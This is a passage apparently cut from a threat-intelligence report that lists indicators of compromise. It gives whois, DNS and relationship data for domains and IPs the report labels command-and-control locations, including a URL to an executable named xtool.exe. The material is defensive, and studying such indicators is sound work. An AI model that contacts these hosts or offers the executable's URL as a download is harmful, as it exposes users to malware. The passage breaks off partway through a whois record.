reduct.ru IN NS ns4.spaceweb.pro 600s(00:10:00)

reduct.ru IN MX

preference: 10

exchange: mx1.spaceweb.ru

600s(00:10:00)

reduct.ru IN MX

preference: 20

exchange: mx2.spaceweb.ru

600s(00:10:00)


Relationships 

(D) insta.reduct.ru Characterized_By (W) Address lookup 

(D) insta.reduct.ru Connected_From (F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba)

(D) insta.reduct.ru Related_To (P) 80 

(D) insta.reduct.ru Related_To (I) 146.185.161.126


Description 

Identified Command and Control Location. 


editprod.waterfilter.in.ua 

Ports 

• 80 

Whois 

Address lookup 

canonical name editprod.waterfilter.in.ua. 
aliases 

addresses 176.114.0.120 

Domain Whois record 

Queried whois.ua with "waterfilter.in.ua"... 

% request from 209.200.70.26 
% This is the Ukrainian Whois query server #1. 

% The Whois is subject to Terms of use 
% See https[:]//hostmaster.ua/services/ 

% 

% The object shown below is NOT in the UANIC database. 

% It has been obtained by querying a remote server: 

% (whois.in.ua) at port 43. 

% 

% REDIRECT BEGIN 
% In.UA whois server, (whois.in.ua) 

% All questions regarding this service please send to help@whois.in.ua 

% To search for domains and In.UA maintainers using the web, visit http[:]//whois.in.ua 

domain: waterfilter.in.ua 

descr: waterfilter.in.ua 

admin-c: THST-UANIC 

tech-c: THST-UANIC 

status: OK-UNTIL 20170310000000 

nserver: ns1.thehost.com.ua 

nserver: ns2.thehost.com.ua 

nserver: ns3.thehost.com.ua 

mnt-by: THEHOST-MNT-INUA 

mnt-lower: THEHOST-MNT-INUA 

changed: hostmaster@thehost.com.ua 20160224094245 

source: INUA 

% REDIRECT END 

Network Whois record 

Queried whois.ripe.net with "-B 176.114.0.120"... 

% Information related to '176.114.0.0 - 176.114.15.255' 

% Abuse contact for '176.114.0.0 - 176.114.15.255' is 'abuse@thehost.ua' 

inetnum: 176.114.0.0 - 176.114.15.255

netname: THEHOST-NETWORK-3 

country: UA 

org: ORG-FSOV1-RIPE 
admin-c: SA7501-RIPE

tech-c: SA7501-RIPE 

status: ASSIGNED PI 

mnt-by: RIPE-NCC-END-MNT 

mnt-by: THEHOST-MNT 

mnt-routes: THEHOST-MNT 

mnt-domains: THEHOST-MNT 

created: 2012-04-10T13:34:51Z 

last-modified: 2016-04-14T10:45:42Z 

source: RIPE 

sponsoring-org: ORG-NL64-RIPE 

organisation: ORG-FSOV1-RIPE 

org-name: FOP Sedinkin Olexandr Valeriyovuch 

org-type: other 

address: 08154, Ukraine, Boyarka, Belogorodskaya str., 11a 

e-mail: info@thehost.ua 

abuse-c: AR19055-RIPE 

abuse-mailbox: abuse@thehost.ua 

remarks: - 

remarks: Hosting Provider TheHost 

remarks: - 

remarks: For abuse/spam issues contact abuse@thehost.ua 

remarks: For general/sales questions contact info@thehost.ua 

remarks: For technical support contact support@thehost.ua 

remarks: - 

phone: +380 44 222-9-888 

phone: +7 499 403-36-28 

fax-no: +380 44 222-9-888 ext. 4 

admin-c: SA7501-RIPE 

mnt-ref: THEHOST-MNT 

mnt-by: THEHOST-MNT 

created: 2011-03-01T10:48:14Z 

last-modified: 2015-11-29T21:16:15Z 
source: RIPE 

person: Sedinkin Alexander 

address: Ukraine, Boyarka, Belogorodskaya str., 11a 

phone: +380 44 222-9-888 ext. 213 

address: UKRAINE 

nic-hdl: SA7501-RIPE 

mnt-by: THEHOST-MNT 

created: 2011-03-01T10:36:18Z 

last-modified: 2015-11-29T21:15:42Z 

source: RIPE 

% Information related to '176.114.0.0/22AS56485' 

route: 176.114.0.0/22 

descr: FOP Sedinkin Olexandr Valeriyovuch 

origin: AS56485 

mnt-by: THEHOST-MNT 

created: 2014-04-26T22:55:50Z 

last-modified: 2014-04-26T22:58:13Z 

source: RIPE 

% This query was served by the RIPE Database Query Service version 1.88 (ANGUS) 
DNS records 

DNS query for 120.0.114.176.in-addr.arpa failed: TimedOut 
name class type data time to live 

editprod.waterfilter.in.ua IN A 176.114.0.120 3600s (01:00:00) 

waterfilter.in.ua IN MX 

preference: 20 

exchange: mail.waterfilter.in.ua 

3600s (01:00:00) 

waterfilter.in.ua IN TXT v=spf1 ip4:176.114.0.120 a mx ~all 3600s (01:00:00)

waterfilter.in.ua IN NS ns2.thehost.com.ua 3600s (01:00:00) 

waterfilter.in.ua IN A 176.114.0.120 3600s (01:00:00) 

waterfilter.in.ua IN SOA 

server: ns1.thehost.com.ua 

email: hostmaster@thehost.com.ua 

serial: 2015031414 

refresh: 10800 

retry: 3600 

expire: 604800 

minimum ttl: 86400 
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3600s (01:00:00) 


waterfilter.in.ua IN NS ns1.thehost.com.ua 3600s (01:00:00) 

waterfilter.in.ua IN MX 

preference: 10 

exchange: mail.waterfilter.in.ua 

3600s (01:00:00) 


waterfilter.in.ua IN NS 
120.0.114.176.in-addr.arpa 
0.114.176.in-addr.arpa IN 
0.114.176.in-addr.arpa IN 
0.114.176.in-addr.arpa IN 


ns3.thehost.com.ua 3600s (01:00:00) 

IN PTRs12.thehost.com.ua 3600s (01:00:00) 

NS ns3.thehost.com.ua 3600s (01:00:00) 

NS ns1.thehost.com.ua3600s (01:00:00) 

SOA 


server: noc.thehost.com.ua 

email: hostmaster@thehost.com.ua 

serial: 2014044192 

refresh: 10800 

retry: 3600 

expire: 604800 

minimum ttl: 86400 


3600s (01:00:00) 

0.114.176.in-addr.arpa IN 
0.114.176.in-addr.arpa IN 


NS ns2.thehost.com.ua 3600s 
NS ns4.thehost.com.ua3600s 


(01:00:00) 

(01:00:00) 


Relationships 

(D) editprod.waterfilter.in.ua Characterized_By (W) Address lookup

(D) editprod.waterfilter.in.ua Connected_From (F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba)

(D) editprod.waterfilter.in.ua Related_To (P) 80

(D) editprod.waterfilter.in.ua Related_To (I) 176.114.0.120


Description 

Identified Command and Control Location. 


mymodule.waterfilter.in.ua/system/logs/xtool.exe 

Ports 

• 80 

Whois 

Address lookup 

canonical name mymodule.waterfilter.in.ua. 
aliases 

addresses 176.114.0.157 

Domain Whois record 

Queried whois.ua with "waterfilter.in.ua"...

% request from 209.200.105.145 
% This is the Ukrainian Whois query server #F. 

% The Whois is subject to Terms of use 
% See https[:]//hostmaster.ua/services/ 

% 

% The object shown below is NOT in the UANIC database. 

% It has been obtained by querying a remote server: 

% (whois.in.ua) at port 43. 

% 

% REDIRECT BEGIN 
% In.UA whois server, (whois.in.ua) 

% All questions regarding this service please send to help@whois.in.ua 

% To search for domains and In.UA maintainers using the web, visit http[:]//whois.in.ua 

domain: waterfilter.in.ua 

descr: waterfilter.in.ua 

admin-c: THST-UANIC 

tech-c: THST-UANIC 

status: OK-UNTIL 20170310000000 

nserver: ns1.thehost.com.ua 

nserver: ns2.thehost.com.ua 

nserver: ns3.thehost.com.ua 

mnt-by: THEHOST-MNT-INUA 

mnt-lower: THEHOST-MNT-INUA 

changed: hostmaster@thehost.com.ua 20160224094245 
source: INUA

% REDIRECT END 


Network Whois record 

Queried whois.ripe.net with "-B 176.114.0.157"... 

% Information related to '176.114.0.0 - 176.114.15.255' 

% Abuse contact for '176.114.0.0 - 176.114.15.255' is 'abuse@thehost.ua' 

inetnum: 176.114.0.0 - 176.114.15.255

netname: THEHOST-NETWORK-3 

country: UA 

org: ORG-FSOV1-RIPE 

admin-c: SA7501-RIPE 

tech-c: SA7501-RIPE 

status: ASSIGNED PI 

mnt-by: RIPE-NCC-END-MNT 

mnt-by: THEHOST-MNT 

mnt-routes: THEHOST-MNT 

mnt-domains: THEHOST-MNT 

created: 2012-04-10T13:34:51Z 

last-modified: 2016-04-14T10:45:42Z 

source: RIPE 

sponsoring-org: ORG-NL64-RIPE 

organisation: ORG-FSOV1-RIPE 

org-name: FOP Sedinkin Olexandr Valeriyovuch 

org-type: other 

address: 08154, Ukraine, Boyarka, Belogorodskaya str., 11a 

e-mail: info@thehost.ua 

abuse-c: AR19055-RIPE 

abuse-mailbox: abuse@thehost.ua 

remarks: - 

remarks: Hosting Provider TheHost 

remarks: - 

remarks: For abuse/spam issues contact abuse@thehost.ua 

remarks: For general/sales questions contact info@thehost.ua 

remarks: For technical support contact support@thehost.ua 

remarks: - 

phone: +380 44 222-9-888 

phone: +7 499 403-36-28 

fax-no: +380 44 222-9-888 ext. 4 

admin-c: SA7501-RIPE 

mnt-ref: THEHOST-MNT 

mnt-by: THEHOST-MNT 

created: 2011-03-01T10:48:14Z 

last-modified: 2015-11-29T21:16:15Z 
source: RIPE 

person: Sedinkin Alexander 

address: Ukraine, Boyarka, Belogorodskaya str., 11a 

phone: +380 44 222-9-888 ext. 213 

address: UKRAINE 

nic-hdl: SA7501-RIPE 

mnt-by: THEHOST-MNT 

created: 2011-03-01T10:36:18Z 

last-modified: 2015-11-29T21:15:42Z 

source: RIPE 

% Information related to '176.114.0.0/22AS56485' 

route: 176.114.0.0/22 

descr: FOP Sedinkin Olexandr Valeriyovuch 

origin: AS56485 

mnt-by: THEHOST-MNT 

created: 2014-04-26T22:55:50Z 

last-modified: 2014-04-26T22:58:13Z 

source: RIPE 

% This query was served by the RIPE Database Query Service version 1.88 (HEREFORD) 
DNS records

DNS query for 157.0.114.176.in-addr.arpa failed: TimedOut
name class type data time to live

mymodule.waterfilter.in.ua IN A 176.114.0.157 3600s (01:00:00)

waterfilter.in.ua IN SOA
server: ns1.thehost.com.ua
email: hostmaster@thehost.com.ua
serial: 2015031414
refresh: 10800
retry: 3600
expire: 604800
minimum ttl: 86400
3600s (01:00:00)

waterfilter.in.ua IN NS ns2.thehost.com.ua 3600s (01:00:00)

waterfilter.in.ua IN MX
preference: 20
exchange: mail.waterfilter.in.ua
3600s (01:00:00)

waterfilter.in.ua IN TXT v=spf1 ip4:176.114.0.120 a mx ~all 3600s (01:00:00)

waterfilter.in.ua IN NS ns3.thehost.com.ua 3600s (01:00:00)

waterfilter.in.ua IN MX
preference: 10
exchange: mail.waterfilter.in.ua
3600s (01:00:00)

waterfilter.in.ua IN A 176.114.0.120 3600s (01:00:00)

waterfilter.in.ua IN NS ns1.thehost.com.ua 3600s (01:00:00)

157.0.114.176.in-addr.arpa IN PTR waterfilter.in.ua 3600s (01:00:00)

0.114.176.in-addr.arpa IN NS ns4.thehost.com.ua 3600s (01:00:00)

0.114.176.in-addr.arpa IN NS ns1.thehost.com.ua 3600s (01:00:00)

0.114.176.in-addr.arpa IN SOA
server: noc.thehost.com.ua
email: hostmaster@thehost.com.ua
serial: 2014044197
refresh: 10800
retry: 3600
expire: 604800
minimum ttl: 86400
3600s (01:00:00)

0.114.176.in-addr.arpa IN NS ns2.thehost.com.ua 3600s (01:00:00)

0.114.176.in-addr.arpa IN NS ns3.thehost.com.ua 3600s (01:00:00)

-- end --

Relationships

(D) mymodule.waterfilter.in.ua/system/logs/xtool.exe Related_To (P) 80

(D) mymodule.waterfilter.in.ua/system/logs/xtool.exe Characterized_By (W) Address lookup

(D) mymodule.waterfilter.in.ua/system/logs/xtool.exe Connected_From (F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba)

(D) mymodule.waterfilter.in.ua/system/logs/xtool.exe Related_To (I) 176.114.0.157

Description

Identified Command and Control Location.


IPs 


204.12.12.40 

URI 

• private.directinvesting.com 

Whois 

Address lookup 

lookup failed 204.12.12.40 

Could not find a domain name corresponding to this IP address. 
Domain Whois record 

Don't have a domain name for which to get a record 
Network Whois record 

Queried whois.arin.net with "n ! NET-204-12-12-32-1"... 

NetRange: 204.12.12.32 - 204.12.12.63 

CIDR: 204.12.12.32/27 

NetName: THEMONEYPAPERINC 

NetHandle: NET-204-12-12-32-1 
Parent: HOSTMYSITE (NET-204-12-0-0-1)

NetType: Reassigned 

OriginAS: AS20021 

Customer: THE MONEYPAPER INC. (C02687180) 

RegDate: 2011-02-03 

Updated: 2011-02-03 

Ref: https[:]//whois.arin.net/rest/net/NET-204-12-12-32-1 

CustName: THE MONEYPAPER INC. 

Address: 555 THEODORE FREMD AVENUE SUITE B-103 

City: RYE 

StateProv: NY 

PostalCode: 10580 

Country: US 

RegDate: 2011-02-03 

Updated: 2011-03-19 

Ref: https[:]//whois.arin.net/rest/customer/C02687180 

OrgNOCHandle: IPADM271-ARIN 

OrgNOCName: IP Admin 

OrgNOCPhone: +1-302-731-4948 

OrgNOCEmail: ipadmin@hostmysite.com 

OrgNOCRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 

OrgTechHandle: IPADM271-ARIN 

OrgTechName: IP Admin 

OrgTechPhone: +1-302-731-4948 

OrgTechEmail: ipadmin@hostmysite.com 

OrgTechRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 

OrgAbuseHandle: ABUSE1072-ARIN 

OrgAbuseName: Abuse 

OrgAbusePhone: +1-302-731-4948 

OrgAbuseEmail: abuse@hostmysite.com 

OrgAbuseRef: https[:]//whois.arin.net/rest/poc/ABUSE1072-ARIN 

RNOCHandle: IPADM271-ARIN 

RNOCName: IP Admin 

RNOCPhone: +1-302-731-4948 

RNOCEmail: ipadmin@hostmysite.com 

RNOCRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 

RTechHandle: IPADM271-ARIN 


RTechName: IP Admin 

RTechPhone: +1-302-731-4948 

RTechEmail: ipadmin@hostmysite.com 

RTechRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 

RAbuseHandle: IPADM271-ARIN 

RAbuseName: IP Admin 

RAbusePhone: +1-302-731-4948 

RAbuseEmail: ipadmin@hostmysite.com 

RAbuseRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 


DNS records 

DNS query for 40.12.12.204.in-addr.arpa returned an error from the server: NameError 

Relationships 

(I) 204.12.12.40 Characterized_By (W) Address lookup

(I) 204.12.12.40 Related_To (D) private.directinvesting.com


209.236.67.159

URI 

• cderlearn.com 

Whois 

Address lookup 

canonical name dl-573-57.slc.westdc.net. 
aliases 

addresses 209.236.67.159 
Domain Whois record 

Queried whois.internic.net with "dom westdc.net"... 
Domain Name: WESTDC.NET 
Registrar: ENOM, INC. 

Sponsoring Registrar IANA ID: 48 
Whois Server: whois.enom.com 
Referral URL: http[:]//www[.]enom.com
Name Server: NS1.WESTDC.NET 
Name Server: NS2.WESTDC.NET 
Name Server: NS3.WESTDC.NET 

Status: clientTransferProhibited https[:]//icann.org/epp#clientTransferProhibited
Updated Date: 09-dec-2015 
Creation Date: 09-sep-2008 
Expiration Date: 09-sep-2019 

>>> Last update of whois database: Sun, 15 Jan 2017 23:13:20 GMT <<<

Queried whois.enom.com with "westdc.net"... 

Domain Name: WESTDC.NET 

Registry Domain ID: 1518630589_DOMAIN_NET-VRSN 

Registrar WHOIS Server: whois.enom.com 

Registrar URL: www[.]enom.com 

Updated Date: 2015-07-14T14:07:24.00Z 

Creation Date: 2008-09-09T19:31:20.00Z 

Registrar Registration Expiration Date: 2019-09-09T19:31:00.00Z 

Registrar: ENOM, INC. 

Registrar IANA ID: 48 

Domain Status: clientTransferProhibited https[:]//www[.]icann.org/epp#clientTransferProhibited
Registry Registrant ID: 

Registrant Name: TECHNICAL SUPPORT 

Registrant Organization: UK2 GROUP 

Registrant Street: 517 WEST 100 NORTH, SUITE #225 

Registrant City: PROVIDENCE 

Registrant State/Province: UT 

Registrant Postal Code: 84332 

Registrant Country: US 

Registrant Phone: +1.4357553433 

Registrant Phone Ext: 

Registrant Fax: +1.4357553449 
Registrant Fax Ext: 

Registrant Email: DOMAINMASTER@UK2GROUP.COM 
Registry Admin ID: 

Admin Name: TECHNICAL SUPPORT 

Admin Organization: UK2 GROUP 

Admin Street: 517 WEST 100 NORTH, SUITE #225 

Admin City: PROVIDENCE 

Admin State/Province: UT 

Admin Postal Code: 84332 

Admin Country: US 

Admin Phone: +1.4357553433 

Admin Phone Ext: 

Admin Fax: +1.4357553449 
Admin Fax Ext: 

Admin Email: DOMAINMASTER@UK2GROUP.COM 
Registry Tech ID: 

Tech Name: TECHNICAL SUPPORT 

Tech Organization: UK2 GROUP 

Tech Street: 517 WEST 100 NORTH, SUITE #225 

Tech City: PROVIDENCE 

Tech State/Province: UT 

Tech Postal Code: 84332 

Tech Country: US 

Tech Phone: +1.4357553433 

Tech Phone Ext: 

Tech Fax: +1.4357553449 
Tech Fax Ext: 

Tech Email: DOMAINMASTER@UK2GROUP.COM 
Name Server: NS1.WESTDC.NET 
Name Server: NS2.WESTDC.NET 
Name Server: NS3.WESTDC.NET 
DNSSEC: unsigned 

Registrar Abuse Contact Email: abuse@enom.com 
Registrar Abuse Contact Phone: +1.4252982646 

URL of the ICANN WHOIS Data Problem Reporting System: http[:]//wdprs.internic.net/ 

>>> Last update of WHOIS database: 2015-07-14T14:07:24.00Z <<<

Network Whois record 

Queried secure.mpcustomer.com with "209.236.67.159"... 

Queried whois.arin.net with "n 209.236.67.159"... 
NetRange: 209.236.64.0 - 209.236.79.255

CIDR: 209.236.64.0/20 

NetName: WH-NET-209-236-64-0-1 

NetHandle: NET-209-236-64-0-1 

Parent: NET209 (NET-209-0-0-0-0) 

NetType: Direct Allocation 

OriginAS: AS29854 

Organization: WestHost, Inc. (WESTHO) 

RegDate: 2010-02-25 

Updated: 2014-01-02 

Ref: https[:]//whois.arin.net/rest/net/NET-209-236-64-0-1 

OrgName: WestHost, Inc. 

OrgId: WESTHO

Address: 517 W 100 N STE 225 

City: Providence 

StateProv: UT 

PostalCode: 84332 
Country: US 

RegDate: 2000-03-13 

Updated: 2016-09-30 

Comment: Please report abuse issues to abuse@uk2group.com 

Ref: https[:]//whois.arin.net/rest/org/WESTHO 

ReferralServer: rwhois://secure.mpcustomer.com:4321 

OrgNOCHandle: NOC12189-ARIN 

OrgNOCName: NOC 

OrgNOCPhone: +1-435-755-3433 

OrgNOCEmail: noc@uk2group.com 

OrgNOCRef: https[:]//whois.arin.net/rest/poc/NOC12189-ARIN 
OrgTechHandle: WESTH1-ARIN 
OrgTechName: WestHost Inc 
OrgTechPhone: +1-435-755-3433 
OrgTechEmail: noc@uk2group.com 

OrgTechRef: https[:]//whois.arin.net/rest/poc/WESTH1-ARIN 

OrgAbuseHandle: WESTH2-ARIN 

OrgAbuseName: WestHost Abuse 

OrgAbusePhone: +1-435-755-3433 

OrgAbuseEmail: abuse@uk2group.com 

OrgAbuseRef: https[:]//whois.arin.net/rest/poc/WESTH2-ARIN 

RTechHandle: WESTH1-ARIN 

RTechName: WestHost Inc 

RTechPhone: +1-435-755-3433 

RTechEmail: noc@uk2group.com 

RTechRef: https[:]//whois.arin.net/rest/poc/WESTH1-ARIN 
RNOCHandle: WESTH1-ARIN 
RNOCName: WestHost Inc 
RNOCPhone: +1-435-755-3433 
RNOCEmail: noc@uk2group.com 

RNOCRef: https[:]//whois.arin.net/rest/poc/WESTH1-ARIN 

RAbuseHandle: WESTH2-ARIN 

RAbuseName: WestHost Abuse 

RAbusePhone: +1-435-755-3433 

RAbuseEmail: abuse@uk2group.com 

RAbuseRef: https[:]//whois.arin.net/rest/poc/WESTH2-ARIN 


DNS records

name class type data time to live

dl-573-57.slc.westdc.net IN A 209.236.67.216 86400s (1.00:00:00)

westdc.net IN SOA
server: ns1.westdc.net
email: hostmaster@westdc.net
serial: 2016018517
refresh: 28800
retry: 7200
expire: 604800
minimum ttl: 600
86400s (1.00:00:00)

westdc.net IN MX
preference: 10
exchange: mail.westdc.net
86400s (1.00:00:00)

westdc.net IN NS ns2.westdc.net 86400s (1.00:00:00)

westdc.net IN NS ns3.westdc.net 86400s (1.00:00:00)

westdc.net IN NS ns1.westdc.net 86400s (1.00:00:00)

159.67.236.209.in-addr.arpa IN PTR dl-573-57.slc.westdc.net 86400s (1.00:00:00)

67.236.209.in-addr.arpa IN SOA
server: ns1.westdc.net
email: hostmaster@westdc.net
serial: 2010074157
refresh: 28800
retry: 7200
expire: 604800
minimum ttl: 600
86400s (1.00:00:00)

67.236.209.in-addr.arpa IN NS ns3.westdc.net 86400s (1.00:00:00)

67.236.209.in-addr.arpa IN NS ns1.westdc.net 86400s (1.00:00:00)

67.236.209.in-addr.arpa IN NS ns2.westdc.net 86400s (1.00:00:00)

Relationships 

(I) 209.236.67.159 Characterized_By (W) Address lookup

(I) 209.236.67.159 Related_To (D) cderlearn.com


146.185.161.126

URI 

• insta.reduct.ru 


Whois 

Address lookup 

lookup failed 146.185.161.126 

Could not find a domain name corresponding to this IP address. 


Domain Whois record 

Don't have a domain name for which to get a record 
Network Whois record 

Queried whois.ripe.net with "-B 146.185.161.126"... 

% Information related to '146.185.160.0 - 146.185.167.255' 

% Abuse contact for '146.185.160.0 - 146.185.167.255' is 'abuse@digitalocean.com' 

inetnum: 146.185.160.0 - 146.185.167.255 

netname: DIGITALOCEAN-AMS-3 

descr: Digital Ocean, Inc. 

country: NL 

admin-c: PT7353-RIPE 

tech-c: PT7353-RIPE 

status: ASSIGNED PA 

mnt-by: digitalocean 

mnt-lower: digitalocean 

mnt-routes: digitalocean 

created: 2013-09-17T17:13:25Z 

last-modified: 2015-11-20T14:45:22Z 

source: RIPE 

person: Network Operations 

address: 101 Ave of the Americas, 10th Floor, New York, NY 10013 

phone: +13478756044 

nic-hdl: PT7353-RIPE 

mnt-by: digitalocean 

created: 2015-03-11T16:37:07Z 

last-modified: 2015-11-19T15:57:21Z

source: RIPE 

e-mail: noc@digitalocean.com 

org: ORG-DOI2-RIPE 

% This query was served by the RIPE Database Query Service version 1.88 (WAGYU) 


DNS records 

DNS query for 126.161.185.146.in-addr.arpa returned an error from the server: NameError 
No records to display 

Relationships 

(I) 146.185.161.126 Characterized_By (W) Address lookup

(I) 146.185.161.126 Related_To (D) insta.reduct.ru


176.114.0.120

URI

• editprod.waterfilter.in.ua 

Whois 

Address lookup 

canonical name s12.thehost.com.ua. 
aliases 

addresses 176.114.0.120 

Domain Whois record 

Queried whois.ua with "thehost.com.ua"... 

% request from 209.200.90.218 
% This is the Ukrainian Whois query server #1. 
% The Whois is subject to Terms of use 
% See https[:]//hostmaster.ua/services/ 

% 


domain: thehost.com.ua

dom-public: NO

registrant: thehost

admin-c: thehost

tech-c: thehost

mnt-by: ua.thehost

nserver: ns4.thehost.com.ua

nserver: ns3.thehost.com.ua

nserver: ns2.thehost.com.ua

nserver: ns1.thehost.com.ua

status: clientDeleteProhibited

status: clientTransferProhibited

created: 2007-10-25 15:16:15+03

modified: 2015-09-09 01:35:49+03

expires: 2020-10-25 15:16:15+02

source: UAEPP

% Glue Records:

%

nserver: ns2.thehost.com.ua

ip-address: 91.109.22.38

nserver: ns4.thehost.com.ua

ip-address: 192.162.240.116

nserver: ns1.thehost.com.ua

ip-address: 91.223.180.14

nserver: ns3.thehost.com.ua

ip-address: 176.111.63.45

% Registrar:

%

registrar: ua.thehost

organization: SE Sedinkin Aleksandr Valerievich

organization-loc: OOn CeqiHKiH OneKcaHflp BanepinoBMH

url: http[:]//thehost.com.ua

city: Boyarka

country: UA

source: UAEPP

% Registrant:

%

contact-id: thehost

person: Hosting provider TheHost

person-loc: Хостинг провайдер TheHost

e-mail: hostmaster@thehost.com.ua

address: Belogorodskaya str., 11a

address: Kyiv region

address: Boyarka

postal-code: 08154

country: UA

address-loc: ул. Белогородская, 11a

address-loc: Киевская область

address-loc: Боярка

postal-code-loc: 08154

country-loc: UA

phone: +380.442229888


fax: +380.672366930 

mnt-by: ua.thehost 

status: linked 
status: clientDeleteProhibited

status: clientTransferProhibited

status: clientUpdateProhibited

created: 2012-11-22 23:02:17+02 

modified: 2015-11-30 00:57:34+02 

source: UAEPP 

% Administrative Contacts: 

% ======================= 

contact-id: thehost 

person: Hosting provider TheHost 

person-loc: Хостинг провайдер TheHost

e-mail: hostmaster@thehost.com.ua 

address: Belogorodskaya str., 11a 

address: Kyiv region 

address: Boyarka 

postal-code: 08154 

country: UA 

address-loc: ул. Белогородская, 11a

address-loc: Киевская область

address-loc: Боярка

postal-code-loc: 08154 
country-loc: UA 

phone: +380.442229888 

fax: +380.672366930 

mnt-by: ua.thehost 

status: linked 

status: clientDeleteProhibited 

status: clientTransferProhibited 

status: clientUpdateProhibited 

created: 2012-11-22 23:02:17+02 

modified: 2015-11-30 00:57:34+02 

source: UAEPP 

% Technical Contacts: 

% =================== 

contact-id: thehost 

person: Hosting provider TheHost 

person-loc: Хостинг провайдер TheHost

e-mail: hostmaster@thehost.com.ua 

address: Belogorodskaya str., 11a 

address: Kyiv region 

address: Boyarka 

postal-code: 08154 

country: UA 

address-loc: ул. Белогородская, 11a

address-loc: Киевская область

address-loc: Боярка

postal-code-loc: 08154 
country-loc: UA 

phone: +380.442229888 

fax: +380.672366930 

mnt-by: ua.thehost 

status: linked 

status: clientDeleteProhibited 

status: clientTransferProhibited 

status: clientUpdateProhibited 

created: 2012-11-22 23:02:17+02 

modified: 2015-11-30 00:57:34+02 

source: UAEPP 

% Query time: 6 msec 

Network Whois record 

Queried whois.ripe.net with "-B 176.114.0.120"... 

% Information related to '176.114.0.0 - 176.114.15.255' 

% Abuse contact for '176.114.0.0 - 176.114.15.255' is 'abuse@thehost.ua' 

inetnum: 176.114.0.0 - 176.114.15.255

netname: THEHOST-NETWORK-3 

country: UA 

org: ORG-FSOV1-RIPE 

admin-c: SA7501-RIPE 

tech-c: SA7501-RIPE 

status: ASSIGNED PI 

mnt-by: RIPE-NCC-END-MNT 
mnt-by: THEHOST-MNT

mnt-routes: THEHOST-MNT 

mnt-domains: THEHOST-MNT 

created: 2012-04-10T13:34:51Z 

last-modified: 2016-04-14T10:45:42Z 

source: RIPE 

sponsoring-org: ORG-NL64-RIPE 

organisation: ORG-FSOV1-RIPE 

org-name: FOP Sedinkin Olexandr Valeriyovuch 

org-type: other 

address: 08154, Ukraine, Boyarka, Belogorodskaya str., 11a 

e-mail: info@thehost.ua 

abuse-c: AR19055-RIPE 

abuse-mailbox: abuse@thehost.ua 

remarks: - 

remarks: Hosting Provider TheHost 

remarks: - 

remarks: For abuse/spam issues contact abuse@thehost.ua 

remarks: For general/sales questions contact info@thehost.ua 

remarks: For technical support contact support@thehost.ua 

remarks: - 

phone: +380 44 222-9-888 

phone: +7 499 403-36-28 

fax-no: +380 44 222-9-888 ext. 4 

admin-c: SA7501-RIPE 

mnt-ref: THEHOST-MNT 

mnt-by: THEHOST-MNT 

created: 2011-03-01T10:48:14Z 

last-modified: 2015-11-29T21:16:15Z 
source: RIPE 

person: Sedinkin Alexander 

address: Ukraine, Boyarka, Belogorodskaya str., 11a 

phone: +380 44 222-9-888 ext. 213 

address: UKRAINE 

nic-hdl: SA7501-RIPE 

mnt-by: THEHOST-MNT 

created: 2011-03-01T10:36:18Z 

last-modified: 2015-11-29T21:15:42Z 

source: RIPE 

% Information related to '176.114.0.0/22AS56485' 

route: 176.114.0.0/22 

descr: FOP Sedinkin Olexandr Valeriyovuch 

origin: AS56485 

mnt-by: THEHOST-MNT 

created: 2014-04-26T22:55:50Z 

last-modified: 2014-04-26T22:58:13Z 

source: RIPE 

% This query was served by the RIPE Database Query Service version 1.88 (ANGUS) 
DNS records

DNS query for 120.0.114.176.in-addr.arpa failed: TimedOut
name class type data time to live

s12.thehost.com.ua IN A 176.114.0.120 3600s (01:00:00)

thehost.com.ua IN SOA
server: ns1.thehost.com.ua
email: hostmaster@thehost.com.ua
serial: 2012093399
refresh: 10800
retry: 3600
expire: 6048000
minimum ttl: 86400
3600s (01:00:00)

thehost.com.ua IN NS ns3.thehost.com.ua 86400s (1.00:00:00)

thehost.com.ua IN A 91.234.33.3 3600s (01:00:00)

thehost.com.ua IN TXT yandex-verification: 7984d982d76e47fa 3600s (01:00:00)

thehost.com.ua IN MX
preference: 20
exchange: aspmx2.googlemail.com
3600s (01:00:00)

thehost.com.ua IN MX
preference: 10
exchange: alt2.aspmx.l.google.com
3600s (01:00:00)

thehost.com.ua IN NS ns4.thehost.com.ua 86400s (1.00:00:00)

thehost.com.ua IN TXT v=spf1 ip4:91.234.32.9 ip4:91.234.35.135 ip4:91.234.35.9 include:_spf.google.com -all 3600s (01:00:00)

thehost.com.ua IN MX
preference: 20
exchange: aspmx3.googlemail.com
3600s (01:00:00)

thehost.com.ua IN NS ns1.thehost.com.ua 86400s (1.00:00:00)

thehost.com.ua IN MX
preference: 40
exchange: aspmx5.googlemail.com
3600s (01:00:00)

thehost.com.ua IN MX
preference: 10
exchange: alt1.aspmx.l.google.com
3600s (01:00:00)

thehost.com.ua IN NS ns2.thehost.com.ua 86400s (1.00:00:00)

thehost.com.ua IN MX
preference: 30
exchange: aspmx4.googlemail.com
3600s (01:00:00)

thehost.com.ua IN MX
preference: 5
exchange: aspmx.l.google.com
3600s (01:00:00)

120.0.114.176.in-addr.arpa IN PTR s12.thehost.com.ua 3557s (00:59:17)

0.114.176.in-addr.arpa IN NS ns4.thehost.com.ua 3600s (01:00:00)

0.114.176.in-addr.arpa IN NS ns3.thehost.com.ua 3600s (01:00:00)

0.114.176.in-addr.arpa IN NS ns1.thehost.com.ua 3600s (01:00:00)

0.114.176.in-addr.arpa IN NS ns2.thehost.com.ua 3600s (01:00:00)

0.114.176.in-addr.arpa IN SOA
server: noc.thehost.com.ua
email: hostmaster@thehost.com.ua
serial: 2014044192
refresh: 10800
retry: 3600
expire: 604800
minimum ttl: 86400
3600s (01:00:00)

Relationships

(I) 176.114.0.120 Characterized_By (W) Address lookup

(I) 176.114.0.120 Related_To (D) editprod.waterfilter.in.ua


176.114.0.157

URI

• mymodule.waterfilter.in.ua/system/logs/xtool.exe

Whois

Address lookup

canonical name waterfilter.in.ua.
aliases

addresses 176.114.0.157
Domain Whois record

Queried whois.ua with "waterfilter.in.ua"...

% request from 209.200.105.145
% This is the Ukrainian Whois query server #F.

% The Whois is subject to Terms of use
% See https[:]//hostmaster.ua/services/

%

